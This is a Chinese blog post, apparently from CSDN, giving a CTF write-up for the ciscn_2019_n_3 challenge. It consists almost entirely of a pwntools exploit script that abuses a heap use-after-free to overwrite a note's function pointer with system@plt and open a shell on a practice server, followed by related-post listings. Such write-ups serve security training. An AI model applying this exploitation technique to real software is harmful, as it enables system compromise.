ciscn_2019_n_3[use after free]

￡神魔★判官ぃ 2023-02-23 07:51 7阅读 0赞

![在这里插入图片描述][2020070523171814.png]  
![在这里插入图片描述][20200705231739155.png]  
exp

from pwn import *
    
    context.log_level = 'debug'
    
    def debug_pause():
        log.info(proc.pidof(p))
        pause()
    
    def new_note(idx, _type, length, value):
        p.sendlineafter('CNote > ', str(1))
        p.sendlineafter('Index > ', str(idx))
        p.sendlineafter('Type > ', str(_type))
        if _type == 2:
            p.sendlineafter('Length > ', str(length))
            p.sendlineafter('Value > ', value)
        else:
            p.sendlineafter('Value > ', value)
    
    
    def del_note(idx):
        p.sendlineafter('CNote > ', str(2))
        p.sendlineafter('Index > ', str(idx))
        
    def show_note(idx):
        p.sendlineafter('CNote > ', str(3))
        p.sendlineafter('Index > ', str(idx))
    
    proc_name = './ciscn_2019_n_3'
    p = process(proc_name)
    p = remote('node3.buuoj.cn', 25454)
    elf = ELF(proc_name)
    
    new_note(0, 2, 0x14, b'a')
    new_note(1, 2, 0x14, b'a')
    del_note(0)
    del_note(1)
    new_note(2, 2, 0xc, b'sh\x00\x00' + p32(elf.plt['system']))
    del_note(0)                                                                                                                                                                                                        
    p.interactive()

![在这里插入图片描述][20200705231422326.png]

[2020070523171814.png]: https://img-blog.csdnimg.cn/2020070523171814.png
[20200705231739155.png]: https://img-blog.csdnimg.cn/20200705231739155.png
[20200705231422326.png]: https://img-blog.csdnimg.cn/20200705231422326.png

发表评论取消回复

表情：

评论列表（有 0 条评论，7人围观）

还没有评论，来说两句吧...

相关阅读

相关 ciscn_2019_n_3[use after free]

![在这里插入图片描述][2020070523171814.png] ![在这里插入图片描述][20200705231739155.png] exp from

￡神魔★判官ぃ/ 2023年02月23日 07:51/ 0 赞/ 8 阅读

相关 hitcontraining_uaf[use after free]

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ub

系统管理员/ 2023年02月22日 08:27/ 0 赞/ 68 阅读

相关 [BJDCTF 2nd]ydsneedgirlfriend2[use after free]

![在这里插入图片描述][20200626171146938.png] 有符号表，而且直接留了后门！ ![在这里插入图片描述][watermark_type_ZmFuZ

分手后的思念是犯贱/ 2023年02月20日 12:09/ 0 赞/ 20 阅读

相关 ciscn_2019_ne_5

这道题如果出现不能反编译参考[文章][Link 1] ![在这里插入图片描述][20200617204815269.png] 简单说一下思路，在`AddLog`中添加的

谁践踏了优雅/ 2023年02月18日 12:53/ 0 赞/ 17 阅读

相关 ciscn_2019_n_5

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ub

男娘i/ 2023年02月18日 09:35/ 0 赞/ 37 阅读

相关 BUUCTF ciscn_2019_n_8

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ub

向右看齐/ 2023年02月17日 02:45/ 0 赞/ 57 阅读

相关 BUUCTF ciscn_2019_c_1

![在这里插入图片描述][20200601171951859.png_pic_center] 跑一下程序，大致流程是 ![在这里插入图片描述][watermark_ty

布满荆棘的人生/ 2023年02月14日 07:42/ 0 赞/ 116 阅读

相关 uaf漏洞利用、use after free

UAF学习–原理及利用： [https://www.cnblogs.com/alert123/p/4918041.html][https_www.cnblogs.com_a

迷南。/ 2022年12月30日 07:47/ 0 赞/ 148 阅读

相关 Fastbin 堆溢出 Use After Free

shell 地址 ![1][] -- coding: utf-8 -- from pwn import elf = ELF('./f

悠悠/ 2022年09月14日 08:52/ 0 赞/ 65 阅读

相关 Fastbin 堆溢出 Use After Free

shell 地址 ![1][] -- coding: utf-8 -- from pwn import elf = ELF('./f

爱被打了一巴掌/ 2022年08月28日 11:00/ 0 赞/ 52 阅读